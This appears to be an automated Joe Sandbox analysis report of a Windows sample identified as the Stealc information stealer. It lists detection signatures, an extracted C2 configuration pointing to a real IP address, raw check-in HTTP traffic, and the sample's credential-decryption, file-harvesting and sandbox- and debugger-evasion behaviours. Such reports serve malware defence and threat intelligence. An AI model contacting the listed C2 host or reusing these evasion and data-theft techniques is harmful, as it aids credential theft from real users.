Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523815
MD5:2252ee92f584848eac43445204fec9a4
SHA1:411ee89cbdcd58f985efce1c042d851b391c5643
SHA256:00f85df4b3b992ef1030c3b26626c3bd961f66eabfc26b9c49d52953415d288b
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2748 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2252EE92F584848EAC43445204FEC9A4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2133685233.0000000004C20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2748JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2748JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.540000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T05:02:05.423757+020020442431Malware Command and Control Activity Detected192.168.2.649710185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.540000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.php~Virustotal: Detection: 15%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpLVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpdVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php7Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpKVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0054C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00547240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00547240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00549AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00549B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00558EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00558EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00554910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0054DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0054E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00554570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0054ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0054BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0054F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00553EA0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECFCAAECBGDGDHIEHJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 37 30 38 42 38 41 36 37 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 2d 2d 0d 0a Data Ascii: ------AECFCAAECBGDGDHIEHJEContent-Disposition: form-data; name="hwid"1A708B8A679D1524750037------AECFCAAECBGDGDHIEHJEContent-Disposition: form-data; name="build"doma------AECFCAAECBGDGDHIEHJE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00544880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00544880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECFCAAECBGDGDHIEHJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 37 30 38 42 38 41 36 37 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 2d 2d 0d 0a Data Ascii: ------AECFCAAECBGDGDHIEHJEContent-Disposition: form-data; name="hwid"1A708B8A679D1524750037------AECFCAAECBGDGDHIEHJEContent-Disposition: form-data; name="build"doma------AECFCAAECBGDGDHIEHJE--
                Source: file.exe, 00000000.00000002.2174797423.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2174797423.0000000001053000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2174797423.0000000001088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
                Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpK
                Source: file.exe, 00000000.00000002.2174797423.0000000001088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpL
                Source: file.exe, 00000000.00000002.2174797423.0000000001088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpd
                Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpft
                Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php~
                Source: file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2174797423.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37e

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C0_2_0090D82C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009179950_2_00917995
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090897D0_2_0090897D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EC2E70_2_008EC2E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2F23F0_2_00A2F23F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009143E90_2_009143E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090F3140_2_0090F314
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009194580_2_00919458
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00928D9B0_2_00928D9B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00910DF40_2_00910DF4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091CE380_2_0091CE38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090BE410_2_0090BE41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B1FF40_2_009B1FF4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ADFEA0_2_007ADFEA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00904F230_2_00904F23
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091AF550_2_0091AF55
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 005445C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: hxrvraam ZLIB complexity 0.9949960339065785
                Source: file.exe, 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2133685233.0000000004C20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00559600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00553720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00553720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\LXOL8KYC.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1860608 > 1048576
                Source: file.exeStatic PE information: Raw size of hxrvraam is bigger than: 0x100000 < 0x1a0200

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;hxrvraam:EW;mezjsajj:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;hxrvraam:EW;mezjsajj:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00559860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d13cf should be: 0x1cd59f
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: hxrvraam
                Source: file.exeStatic PE information: section name: mezjsajj
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F082 push 63B32B51h; mov dword ptr [esp], ebp0_2_0093F0A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E70BE push ebp; mov dword ptr [esp], edx0_2_008E7114
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E70BE push ebx; mov dword ptr [esp], 549B1673h0_2_008E711D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F38A9 push ebx; mov dword ptr [esp], edx0_2_009F38AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097B0CC push edx; mov dword ptr [esp], ecx0_2_0097B0F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B98C6 push 00CFBED6h; mov dword ptr [esp], ebp0_2_009B996C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055B035 push ecx; ret 0_2_0055B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0003B push edi; mov dword ptr [esp], ebx0_2_00A00069
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DB838 push 5BAE3EC3h; mov dword ptr [esp], ebx0_2_008DB850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DB838 push ecx; mov dword ptr [esp], esi0_2_008DB859
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DB838 push esi; mov dword ptr [esp], edx0_2_008DB953
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DB838 push esi; mov dword ptr [esp], 065A1825h0_2_008DB95C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DB838 push 53A7AFD7h; mov dword ptr [esp], eax0_2_008DB96B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push eax; mov dword ptr [esp], 1F826F9Ah0_2_0090D83C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push 7FA3C861h; mov dword ptr [esp], eax0_2_0090D87A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push 034445A3h; mov dword ptr [esp], edi0_2_0090D9AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push 1D645F46h; mov dword ptr [esp], edi0_2_0090D9B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push 0A8EA261h; mov dword ptr [esp], eax0_2_0090DA46
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push 09BA91AAh; mov dword ptr [esp], esi0_2_0090DA55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push 1705CA24h; mov dword ptr [esp], edi0_2_0090DA68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push edi; mov dword ptr [esp], eax0_2_0090DA8A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push edx; mov dword ptr [esp], eax0_2_0090DA9B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push eax; mov dword ptr [esp], 71F5E112h0_2_0090DBAC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push edx; mov dword ptr [esp], eax0_2_0090DC19
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push ebp; mov dword ptr [esp], eax0_2_0090DC7D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push edx; mov dword ptr [esp], 1C9617C2h0_2_0090DD05
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push 63BE7F5Bh; mov dword ptr [esp], edx0_2_0090DD6C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push ebx; mov dword ptr [esp], ecx0_2_0090DD73
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push 66EFC9D1h; mov dword ptr [esp], edx0_2_0090DDF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push 20BCCB36h; mov dword ptr [esp], ebx0_2_0090DDFF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090D82C push 29006B6Eh; mov dword ptr [esp], eax0_2_0090DEAB
                Source: file.exeStatic PE information: section name: hxrvraam entropy: 7.954518542392513

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00559860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13619
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A20D8 second address: 7A20E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FAAC5254A86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1967 second address: 7A1973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1973 second address: 7A197C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A197C second address: 7A1980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9236A6 second address: 9236AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
